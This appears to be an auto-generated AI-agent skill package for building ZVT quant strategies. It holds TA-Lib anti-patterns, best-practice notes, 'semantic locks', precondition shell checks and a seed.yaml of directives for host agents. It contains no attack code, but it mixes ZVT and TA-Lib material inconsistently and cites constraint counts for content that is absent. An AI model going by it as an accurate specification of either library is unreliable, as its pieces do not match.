- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['TA-Lib Documentation HTML Generator', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder', 'Institutional fund holdings tracker via joinquant_fund_runner pattern', 'Custom Transformer + Accumulator factor with per-entity rolling state']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **15**

## finance-bp-109--ta-lib-python (8)

### `AP-TECHNICAL-ANALYSIS-001` — C FFI Type Mismatch with Non-float64 Arrays <sub>(high)</sub>

Passing non-float64 (NPY_DOUBLE) numpy arrays to TA-Lib C functions causes memory corruption or silent incorrect calculations. The C FFI layer expects precisely float64 precision, and type mismatches propagate undetected, producing wrong indicator values that may silently corrupt trading strategies. Root cause is not validating array dtype before the C function call.

### `AP-TECHNICAL-ANALYSIS-002` — Multidimensional Array Memory Access Violations <sub>(high)</sub>

Passing multidimensional numpy arrays to TA-Lib C functions causes segmentation faults and memory access violations due to incorrect stride calculations. The C layer assumes contiguous 1-dimensional memory layouts, and higher-dimensional inputs break its internal pointer arithmetic, leading to crashes or silent memory corruption.

### `AP-TECHNICAL-ANALYSIS-003` — Ignoring TA_RetCode Error Status from C Calls <sub>(high)</sub>

When TA-Lib C functions return non-zero TA_RetCode values (indicating errors like uninitialized library, invalid parameters, or out-of-range inputs), ignoring these codes silently propagates invalid computation results. This leads to incorrect technical indicator values feeding into trading strategies without any warning, potentially causing significant financial loss.

### `AP-TECHNICAL-ANALYSIS-004` — Mismatched Array Lengths in Multi-Input Functions <sub>(high)</sub>

When calculating indicators that require multiple input arrays (e.g., open, high, low, close, volume), providing arrays of different lengths causes out-of-bounds memory access. TA-Lib iterates assuming identical sizes, and length mismatches produce garbage values or segmentation faults, corrupting the entire indicator output.

### `AP-TECHNICAL-ANALYSIS-011` — Stale Cached Outputs Without Invalidation <sub>(medium)</sub>

Caching computed indicator outputs without invalidating when inputs, parameters, or input_names change causes stale results to be returned even when underlying data has changed. This produces incorrect indicator values that silently propagate into trading strategies, leading to wrong signals based on outdated calculations.

### `AP-TECHNICAL-ANALYSIS-012` — Concurrent Access Without Thread-Local State <sub>(high)</sub>

Using shared Function instances across multiple threads without thread-local storage causes race conditions where concurrent threads share state. This leads to data corruption, incorrect results, and non-deterministic indicator values when multiple threads compute indicators simultaneously on the same instance.

### `AP-TECHNICAL-ANALYSIS-013` — Using Python Lists Instead of NumPy Arrays for Stream Functions <sub>(medium)</sub>

Stream functions require numpy.ndarray inputs due to direct C API access via PyArray_TYPE() and PyArray_FLAGS(). Passing plain Python lists or other sequences causes runtime errors because the C layer cannot access the underlying C arrays. This breaks real-time indicator calculations that expect efficient numpy buffer access.

### `AP-TECHNICAL-ANALYSIS-014` — Library Not Initialized Before C Function Calls <sub>(high)</sub>

Calling TA-Lib C functions without prior library initialization returns TA_RetCode=1 (TA_LIB_NOT_INITIALIZE), causing all function calls to fail. This is a silent failure mode that produces no output indicators, breaking batch calculation pipelines unless the initialization step is explicitly performed before any function calls.

## finance-bp-122--ta-python (7)

### `AP-TECHNICAL-ANALYSIS-005` — Time-Series Index Reindexing Breaks Alignment <sub>(high)</sub>

Reindexing or resetting the DataFrame/Series index after computing technical indicators breaks temporal alignment with original price data and other features. This causes look-ahead bias, shifts indicator values to incorrect timestamps, and corrupts time-series datasets when used in backtesting or feature engineering pipelines.

### `AP-TECHNICAL-ANALYSIS-006` — NaN/Inf/Zero Propagation Corrupts Indicator Values <sub>(high)</sub>

Failing to clean input data of NaN, infinite values, or zero prices causes cascading corruption through rolling window calculations. Division-by-zero errors on zero prices produce NaN that propagates into all subsequent indicator values, corrupting entire datasets. Invalid values also cause incorrect boolean mask classifications when compared with np.inf directly.

### `AP-TECHNICAL-ANALYSIS-007` — EMA Smoothing Parameter Divergence from TA Standards <sub>(medium)</sub>

Using pandas adjust=True (the default) for ewm() when implementing EMA-based indicators produces Yahoo Finance variant smoothing instead of standard recursive exponential smoothing per technical analysis textbooks. This causes different signal thresholds and divergence from widely-accepted indicator calculations, leading to inconsistent trading signals.

### `AP-TECHNICAL-ANALYSIS-008` — False Claims: Indicator Calculation as Trading Signal <sub>(high)</sub>

Presenting technical indicator values as real-time trading signals or guaranteed future performance misleads users about the tool's capabilities. The library calculates historical indicators from OHLCV data; claiming these as trading signals leads to improper trading decisions. Backtest results also do not guarantee future performance due to look-ahead bias and market regime changes.

### `AP-TECHNICAL-ANALYSIS-009` — Functional vs OOP API Implementation Divergence <sub>(medium)</sub>

When both functional wrappers (e.g., rsi()) and OOP classes (e.g., RSIIndicator) are provided, diverging implementations produce different indicator values for the same inputs. This causes confusion, test failures, and breaks user code that expects consistent behavior across APIs. The functional wrapper must delegate to the class implementation to ensure equivalence.

### `AP-TECHNICAL-ANALYSIS-010` — Bollinger Bands Using Sample Std Deviation <sub>(medium)</sub>

Using pandas default ddof=1 (sample standard deviation) for Bollinger Bands produces wider bands than John Bollinger's original specification, which uses population standard deviation. This causes overestimation of volatility, incorrect trading signal thresholds, and divergence from the canonical indicator calculation that traders expect.

### `AP-TECHNICAL-ANALYSIS-015` — Stateful Wrapper Functions Leak State Across Calls <sub>(medium)</sub>

When functional wrapper functions retain internal state between calls, different input series contaminate each other's results through data leakage. This produces incorrect indicator values when the same wrapper function is called sequentially with different data, as cached state from previous calls affects new computations.

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-109--ta-lib-python
**Scan date**: 2026-04-22
**Stats**: {'total_files': 6, 'total_classes': 23, 'total_functions': 0, 'total_stages': 6}

## Modules (6)

- [c_library_binding_layer](components/c_library_binding_layer.md): 2 classes
- [function_api_(batch)](components/function_api_-batch.md): 4 classes
- [stream_api_(incremental)](components/stream_api_-incremental.md): 4 classes
- [abstract_api_(stateful)](components/abstract_api_-stateful.md): 7 classes
- [series_support_layer](components/series_support_layer.md): 2 classes
- [code_generation](components/code_generation.md): 4 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 104
  fatal_constraints_count: 27
  non_fatal_constraints_count: 147
  use_cases_count: 1
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **1**

## `KUC-101`
**Source**: `docs/generate_html_pages.py`

Converts TA-Lib markdown documentation into styled HTML pages for web publishing, and generates Pygments syntax highlighting CSS for code examples in documentation.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **9**

## `CW-TECHNICAL-ANALYSIS-001` — Explicit Input Validation Before Computation
**From**: finance-bp-109--ta-lib-python, finance-bp-122--ta-python · **Applicable to**: technical-analysis

Both projects require rigorous pre-computation validation: dtype checking (float64 for C FFI, numeric for pandas), dimension checking (1D arrays for C layer), and length validation. This defensive pattern prevents silent failures and memory corruption. Apply this pattern whenever interfacing with external C libraries or computing indicators on potentially malformed input data.

## `CW-TECHNICAL-ANALYSIS-002` — Index Preservation Throughout Indicator Pipeline
**From**: finance-bp-109--ta-lib-python, finance-bp-122--ta-python · **Applicable to**: technical-analysis

Preserving the original DataFrame/Series index without reindexing or reset is critical for temporal alignment. When constructing output Series, use index=self._close.index to maintain alignment with price data. This prevents look-ahead bias and ensures downstream features correctly reference their corresponding timestamps.

## `CW-TECHNICAL-ANALYSIS-003` — Data Cleaning Before Indicator Computation
**From**: finance-bp-122--ta-python · **Applicable to**: technical-analysis

Indicators like RSI, MACD, and Bollinger Bands produce incorrect results when fed NaN, inf, or zero values. Remove rows with zero prices (to prevent division-by-zero), filter out infinite values using the exp(709) threshold as the maximum float64, and apply dropna to DataFrames before passing to indicator functions. This ensures clean propagation through rolling window calculations.

## `CW-TECHNICAL-ANALYSIS-004` — Error Code Propagation from C to Python Layer
**From**: finance-bp-109--ta-lib-python · **Applicable to**: technical-analysis

Always call _ta_check_success and raise exceptions on non-zero TA_RetCode return values from C function calls. This pattern ensures that errors like uninitialized library, invalid parameters, or out-of-range inputs propagate as proper Python exceptions instead of silently producing garbage values. Never ignore return codes from the underlying C library.

## `CW-TECHNICAL-ANALYSIS-005` — Thread-Local Storage for Concurrent Indicator Access
**From**: finance-bp-109--ta-lib-python · **Applicable to**: technical-analysis

When the same Function instance may be accessed from multiple threads, use thread-local storage to maintain isolated state per thread. This prevents race conditions, state corruption, and non-deterministic results when concurrent threads compute indicators simultaneously. The pattern is essential for any multi-threaded trading system or async processing pipeline.

## `CW-TECHNICAL-ANALYSIS-006` — Functional Wrapper Delegates to OOP Implementation
**From**: finance-bp-122--ta-python · **Applicable to**: technical-analysis

Functional wrapper functions like rsi() and ema_indicator() should instantiate the corresponding Indicator class and call its result method, not reimplement logic. This ensures OOP and functional APIs produce identical outputs. Any divergence causes test failures and breaks user code that switches between API styles. Validate equivalence in test suites.

## `CW-TECHNICAL-ANALYSIS-007` — Standard TA Textbook Parameters for EMA Calculations
**From**: finance-bp-122--ta-python · **Applicable to**: technical-analysis

When implementing EMA-based indicators, use adjust=False in pandas ewm() to match standard recursive exponential smoothing from technical analysis textbooks, not the Yahoo Finance variant. Also use ddof=0 for Bollinger Bands standard deviation per the original specification. Deviations produce different signal thresholds that diverge from what traders expect.

## `CW-TECHNICAL-ANALYSIS-008` — Cache Invalidation on Any Input Change
**From**: finance-bp-109--ta-lib-python · **Applicable to**: technical-analysis

Set outputs_valid flag to False whenever inputs, parameters, or input_names change. This pattern prevents returning stale cached outputs when underlying data or parameters have been modified. Implement proper cache invalidation to ensure computed indicators always reflect the current state.

## `CW-TECHNICAL-ANALYSIS-009` — Library Initialization Before First Use
**From**: finance-bp-109--ta-lib-python, finance-bp-122--ta-python · **Applicable to**: technical-analysis

Explicitly initialize the TA-Lib C library before any function calls. Without initialization, all function calls fail with TA_RetCode=1 (TA_LIB_NOT_INITIALIZE). This is a critical setup step that must be performed once before the indicator computation pipeline begins, typically at application startup or when first loading the library.

FILE:references/components/abstract_api_-stateful.md
# abstract_api_(stateful) (7 classes)

## `Function.__call__`
`abstract_api_(stateful)/function-call.py:0`

## `Function.set_input_arrays`
`abstract_api_(stateful)/function-set-input-arrays.py:0`

## `SMA.invoke`
`abstract_api_(stateful)/sma-invoke.py:0`

## `BBANDS.invoke`
`abstract_api_(stateful)/bbands-invoke.py:0`

## `STOCH.invoke`
`abstract_api_(stateful)/stoch-invoke.py:0`

## `Input data type`
`abstract_api_(stateful)/input-data-type.py:0`

## `Input price series`
`abstract_api_(stateful)/input-price-series.py:0`

FILE:references/components/c_library_binding_layer.md
# c_library_binding_layer (2 classes)

## `TA_RetCode enum access`
`c_library_binding_layer/ta-retcode-enum-access.py:0`

## `Array validation`
`c_library_binding_layer/array-validation.py:0`

FILE:references/components/code_generation.md
# code_generation (4 classes)

## `generate_func.execute`
`code_generation/generate-func-execute.py:0`

## `generate_stream.execute`
`code_generation/generate-stream-execute.py:0`

## `generate_abstract_stub.execute`
`code_generation/generate-abstract-stub-execute.py:0`

## `Name transformation rules`
`code_generation/name-transformation-rules.py:0`

FILE:references/components/function_api_-batch.md
# function_api_(batch) (4 classes)

## `SMA.compute`
`function_api_(batch)/sma-compute.py:0`

## `BBANDS.compute`
`function_api_(batch)/bbands-compute.py:0`

## `ADX.compute`
`function_api_(batch)/adx-compute.py:0`

## `Lookback padding`
`function_api_(batch)/lookback-padding.py:0`

FILE:references/components/series_support_layer.md
# series_support_layer (2 classes)

## `_wrapper.decorate`
`series_support_layer/wrapper-decorate.py:0`

## `Series type detection`
`series_support_layer/series-type-detection.py:0`

FILE:references/components/stream_api_-incremental.md
# stream_api_(incremental) (4 classes)

## `stream_MOM.execute`
`stream_api_(incremental)/stream-mom-execute.py:0`

## `stream_CDL3BLACKCROWS.execute`
`stream_api_(incremental)/stream-cdl3blackcrows-execute.py:0`

## `stream_SMA.execute`
`stream_api_(incremental)/stream-sma-execute.py:0`

## `Streaming state`
`stream_api_(incremental)/streaming-state.py:0`

FILE:references/seed.yaml
meta:
  id: finance-bp-109-v5.3
  version: v6.1
  blueprint_id: finance-bp-109
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-22T13:00:52.305302+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    - "[V6 READING ORDER]\nThis crystal contains the following V6 layers. Before answering any business question, the host\
      \ MUST read them in order:\n  1. anti_patterns[] — cross-project anti-patterns (with AP-* ids)\n  2. cross_project_wisdom[]\
      \ — cross-project wisdom (with CW-* ids)\n  3. domain_constraints_injected[] — domain constraints (SHARED-* ids)\n \
      \ 4. known_use_cases[] — concrete business scenarios (KUC-* ids)\n  5. component_capability_map — AST component map\
      \ (by module)\n\nWhen answering user questions, proactively cite relevant AP-*/CW-*/SHARED-*/KUC-* ids with source text.\
      \ Examples: T+1 rules -> cite SHARED-* constraint; model comparison -> warn via AP-*; follow-holdings strategy -> cite\
      \ KUC-* with example file."
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
  capability_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  upgraded_from: finance-bp-109-v1.seed.yaml
  upgraded_at: '2026-04-22T13:20:29.426886+00:00'
  v6_inputs:
    ast_mind_map: knowledge/sources/finance/finance-bp-109--ta-lib-python/v6_inputs/ast_mind_map.yaml
    anti_patterns: null
    cross_project_wisdom: null
    examples_kuc: knowledge/sources/finance/finance-bp-109--ta-lib-python/v6_inputs/examples_kuc.yaml
    shared_pools_dir: knowledge/sources/finance/_shared
anti_patterns:
- id: AP-TECHNICAL-ANALYSIS-001
  title: C FFI Type Mismatch with Non-float64 Arrays
  description: Passing non-float64 (NPY_DOUBLE) numpy arrays to TA-Lib C functions causes memory corruption or silent incorrect
    calculations. The C FFI layer expects precisely float64 precision, and type mismatches propagate undetected, producing
    wrong indicator values that may silently corrupt trading strategies. Root cause is not validating array dtype before the
    C function call.
  project_source: finance-bp-109--ta-lib-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-002
  title: Multidimensional Array Memory Access Violations
  description: Passing multidimensional numpy arrays to TA-Lib C functions causes segmentation faults and memory access violations
    due to incorrect stride calculations. The C layer assumes contiguous 1-dimensional memory layouts, and higher-dimensional
    inputs break its internal pointer arithmetic, leading to crashes or silent memory corruption.
  project_source: finance-bp-109--ta-lib-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-003
  title: Ignoring TA_RetCode Error Status from C Calls
  description: When TA-Lib C functions return non-zero TA_RetCode values (indicating errors like uninitialized library, invalid
    parameters, or out-of-range inputs), ignoring these codes silently propagates invalid computation results. This leads
    to incorrect technical indicator values feeding into trading strategies without any warning, potentially causing significant
    financial loss.
  project_source: finance-bp-109--ta-lib-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-004
  title: Mismatched Array Lengths in Multi-Input Functions
  description: When calculating indicators that require multiple input arrays (e.g., open, high, low, close, volume), providing
    arrays of different lengths causes out-of-bounds memory access. TA-Lib iterates assuming identical sizes, and length mismatches
    produce garbage values or segmentation faults, corrupting the entire indicator output.
  project_source: finance-bp-109--ta-lib-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-005
  title: Time-Series Index Reindexing Breaks Alignment
  description: Reindexing or resetting the DataFrame/Series index after computing technical indicators breaks temporal alignment
    with original price data and other features. This causes look-ahead bias, shifts indicator values to incorrect timestamps,
    and corrupts time-series datasets when used in backtesting or feature engineering pipelines.
  project_source: finance-bp-122--ta-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-006
  title: NaN/Inf/Zero Propagation Corrupts Indicator Values
  description: Failing to clean input data of NaN, infinite values, or zero prices causes cascading corruption through rolling
    window calculations. Division-by-zero errors on zero prices produce NaN that propagates into all subsequent indicator
    values, corrupting entire datasets. Invalid values also cause incorrect boolean mask classifications when compared with
    np.inf directly.
  project_source: finance-bp-122--ta-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-007
  title: EMA Smoothing Parameter Divergence from TA Standards
  description: Using pandas adjust=True (the default) for ewm() when implementing EMA-based indicators produces Yahoo Finance
    variant smoothing instead of standard recursive exponential smoothing per technical analysis textbooks. This causes different
    signal thresholds and divergence from widely-accepted indicator calculations, leading to inconsistent trading signals.
  project_source: finance-bp-122--ta-python
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-008
  title: 'False Claims: Indicator Calculation as Trading Signal'
  description: Presenting technical indicator values as real-time trading signals or guaranteed future performance misleads
    users about the tool's capabilities. The library calculates historical indicators from OHLCV data; claiming these as trading
    signals leads to improper trading decisions. Backtest results also do not guarantee future performance due to look-ahead
    bias and market regime changes.
  project_source: finance-bp-122--ta-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-009
  title: Functional vs OOP API Implementation Divergence
  description: When both functional wrappers (e.g., rsi()) and OOP classes (e.g., RSIIndicator) are provided, diverging implementations
    produce different indicator values for the same inputs. This causes confusion, test failures, and breaks user code that
    expects consistent behavior across APIs. The functional wrapper must delegate to the class implementation to ensure equivalence.
  project_source: finance-bp-122--ta-python
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-010
  title: Bollinger Bands Using Sample Std Deviation
  description: Using pandas default ddof=1 (sample standard deviation) for Bollinger Bands produces wider bands than John
    Bollinger's original specification, which uses population standard deviation. This causes overestimation of volatility,
    incorrect trading signal thresholds, and divergence from the canonical indicator calculation that traders expect.
  project_source: finance-bp-122--ta-python
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-011
  title: Stale Cached Outputs Without Invalidation
  description: Caching computed indicator outputs without invalidating when inputs, parameters, or input_names change causes
    stale results to be returned even when underlying data has changed. This produces incorrect indicator values that silently
    propagate into trading strategies, leading to wrong signals based on outdated calculations.
  project_source: finance-bp-109--ta-lib-python
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-012
  title: Concurrent Access Without Thread-Local State
  description: Using shared Function instances across multiple threads without thread-local storage causes race conditions
    where concurrent threads share state. This leads to data corruption, incorrect results, and non-deterministic indicator
    values when multiple threads compute indicators simultaneously on the same instance.
  project_source: finance-bp-109--ta-lib-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-013
  title: Using Python Lists Instead of NumPy Arrays for Stream Functions
  description: Stream functions require numpy.ndarray inputs due to direct C API access via PyArray_TYPE() and PyArray_FLAGS().
    Passing plain Python lists or other sequences causes runtime errors because the C layer cannot access the underlying C
    arrays. This breaks real-time indicator calculations that expect efficient numpy buffer access.
  project_source: finance-bp-109--ta-lib-python
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-014
  title: Library Not Initialized Before C Function Calls
  description: Calling TA-Lib C functions without prior library initialization returns TA_RetCode=1 (TA_LIB_NOT_INITIALIZE),
    causing all function calls to fail. This is a silent failure mode that produces no output indicators, breaking batch calculation
    pipelines unless the initialization step is explicitly performed before any function calls.
  project_source: finance-bp-109--ta-lib-python
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
- id: AP-TECHNICAL-ANALYSIS-015
  title: Stateful Wrapper Functions Leak State Across Calls
  description: When functional wrapper functions retain internal state between calls, different input series contaminate each
    other's results through data leakage. This produces incorrect indicator values when the same wrapper function is called
    sequentially with different data, as cached state from previous calls affects new computations.
  project_source: finance-bp-122--ta-python
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - technical-analysis
  _source_file: anti-patterns/technical-analysis.yaml
cross_project_wisdom:
- wisdom_id: CW-TECHNICAL-ANALYSIS-001
  source_project: finance-bp-109--ta-lib-python, finance-bp-122--ta-python
  pattern_name: Explicit Input Validation Before Computation
  description: 'Both projects require rigorous pre-computation validation: dtype checking (float64 for C FFI, numeric for
    pandas), dimension checking (1D arrays for C layer), and length validation. This defensive pattern prevents silent failures
    and memory corruption. Apply this pattern whenever interfacing with external C libraries or computing indicators on potentially
    malformed input data.'
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-002
  source_project: finance-bp-109--ta-lib-python, finance-bp-122--ta-python
  pattern_name: Index Preservation Throughout Indicator Pipeline
  description: Preserving the original DataFrame/Series index without reindexing or reset is critical for temporal alignment.
    When constructing output Series, use index=self._close.index to maintain alignment with price data. This prevents look-ahead
    bias and ensures downstream features correctly reference their corresponding timestamps.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-003
  source_project: finance-bp-122--ta-python
  pattern_name: Data Cleaning Before Indicator Computation
  description: Indicators like RSI, MACD, and Bollinger Bands produce incorrect results when fed NaN, inf, or zero values.
    Remove rows with zero prices (to prevent division-by-zero), filter out infinite values using the exp(709) threshold as
    the maximum float64, and apply dropna to DataFrames before passing to indicator functions. This ensures clean propagation
    through rolling window calculations.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-004
  source_project: finance-bp-109--ta-lib-python
  pattern_name: Error Code Propagation from C to Python Layer
  description: Always call _ta_check_success and raise exceptions on non-zero TA_RetCode return values from C function calls.
    This pattern ensures that errors like uninitialized library, invalid parameters, or out-of-range inputs propagate as proper
    Python exceptions instead of silently producing garbage values. Never ignore return codes from the underlying C library.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-005
  source_project: finance-bp-109--ta-lib-python
  pattern_name: Thread-Local Storage for Concurrent Indicator Access
  description: When the same Function instance may be accessed from multiple threads, use thread-local storage to maintain
    isolated state per thread. This prevents race conditions, state corruption, and non-deterministic results when concurrent
    threads compute indicators simultaneously. The pattern is essential for any multi-threaded trading system or async processing
    pipeline.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-006
  source_project: finance-bp-122--ta-python
  pattern_name: Functional Wrapper Delegates to OOP Implementation
  description: Functional wrapper functions like rsi() and ema_indicator() should instantiate the corresponding Indicator
    class and call its result method, not reimplement logic. This ensures OOP and functional APIs produce identical outputs.
    Any divergence causes test failures and breaks user code that switches between API styles. Validate equivalence in test
    suites.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-007
  source_project: finance-bp-122--ta-python
  pattern_name: Standard TA Textbook Parameters for EMA Calculations
  description: When implementing EMA-based indicators, use adjust=False in pandas ewm() to match standard recursive exponential
    smoothing from technical analysis textbooks, not the Yahoo Finance variant. Also use ddof=0 for Bollinger Bands standard
    deviation per the original specification. Deviations produce different signal thresholds that diverge from what traders
    expect.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-008
  source_project: finance-bp-109--ta-lib-python
  pattern_name: Cache Invalidation on Any Input Change
  description: Set outputs_valid flag to False whenever inputs, parameters, or input_names change. This pattern prevents returning
    stale cached outputs when underlying data or parameters have been modified. Implement proper cache invalidation to ensure
    computed indicators always reflect the current state.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
- wisdom_id: CW-TECHNICAL-ANALYSIS-009
  source_project: finance-bp-109--ta-lib-python, finance-bp-122--ta-python
  pattern_name: Library Initialization Before First Use
  description: Explicitly initialize the TA-Lib C library before any function calls. Without initialization, all function
    calls fail with TA_RetCode=1 (TA_LIB_NOT_INITIALIZE). This is a critical setup step that must be performed once before
    the indicator computation pipeline begins, typically at application startup or when first loading the library.
  applicable_to_activity: technical-analysis
  _source_file: cross-project-wisdom/technical-analysis.yaml
domain_constraints_injected: []
resources_injected: {}
known_use_cases:
- kuc_id: KUC-101
  source_file: docs/generate_html_pages.py
  business_problem: Converts TA-Lib markdown documentation into styled HTML pages for web publishing, and generates Pygments
    syntax highlighting CSS for code examples in documentation.
  intent_keywords:
  - documentation generation
  - html pages
  - pygments stylesheet
